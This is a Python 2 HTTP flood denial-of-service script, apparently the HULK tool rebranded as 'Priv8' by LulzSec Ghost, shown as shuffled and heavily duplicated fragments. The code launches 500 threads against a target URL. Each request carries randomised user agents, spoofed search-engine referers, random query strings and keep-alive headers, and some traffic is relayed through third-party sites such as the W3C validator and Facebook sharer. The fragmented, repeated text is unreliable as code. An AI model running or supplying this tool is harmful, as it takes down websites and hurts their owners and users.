headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list():", "keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370')", "153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1;", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android", "<EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 
evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06", "headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)')", ":_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o | / ' |", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword", "2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2')", "O ._O O_. O ._O O_. ; ; : `. // // //", "Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search')", "| | | | `| : `' ,' `. 
/ |`-:_ ; |", "SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')", "6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "(Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0", "0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)')", "v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot')", "Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus", "Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)')", "headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)')", "EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 
(compatible; MSIE", ". _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _... Lulz ,'/ ;|/..--''", "headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston", "a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0", "run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" %", "CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like", "sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m", "Safari/537.36') # generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=')", "headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0", "| | : O ._O O_. O ._O O_. 
; ; : `.", "def buildblock(size): out_str = '' for i in range(0, size): a = random.randint(65,", "(Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2", "ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like", "(linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/)", "headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)')", "headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48')", "5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list", "= 
urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control',", "fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U;", "(Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT", "= sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*', url)", "headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0;", "org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build", "O_. O ._O O_. ; ; : `. 
// // // // ,'", "safe safe=1 # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0", "(Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "+ \"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500):", "<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh;", "Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;", ": / ( ;|;-./_ _/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,' |", "print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else: if", "(Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0", "Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0", "MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows;", "NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)", "return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") 
bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\")", "headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x", "4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1)", "Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web", "Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel", "Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30", "(Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') 
headers_useragents.append('Mozilla/5.0", "(http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X", "/ , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O ._O O_.", "1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0')", "251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3')", "U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile", "6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X", "(KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)", "Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander", "headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') 
headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=')", "WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT", "libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0')", "_// _// _// ~ _// ~ ~ / / / / / /", "ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real", "CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1')", "\"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _... 
Lulz ,'/", "headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600')", "5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)')", "headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML,", "compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47')", "One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide')", "buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code", "return(bots) #builds random ascii string def buildblock(size): out_str = '' for i in", "headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 
By +(www.21seek.com A", "blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir", "Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko)", "Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0", "//~ // // ~~ _// _// _// ~ _// ~ ~ / /", "headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx')", "usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3:", "headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com;", "6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0;", "headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') 
headers_useragents.append('+SitiDi.net/SitiDiBot/1.0", "random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print", "(crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer')", "headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase", ": `' ,' `. / |`-:_ ; | | | : \\ `--.", "Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML,", "http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)')", "keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\")", "headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') 
headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0')", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;", "bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\")", "simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001", "buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120))", "random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 
'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e:", "headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb')", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=')", "<gh_stars>0 import urllib2 import sys import threading import random import re #global params", "east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots(): global bots bots=[]", "http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0", "headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 
(Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger", "8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U;", "bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): out_str", "headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16", "set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m =", "Crawling your site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3", "headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64')", "Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows;", "AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 
Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1;", "4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous')", "like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124", "Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)')", 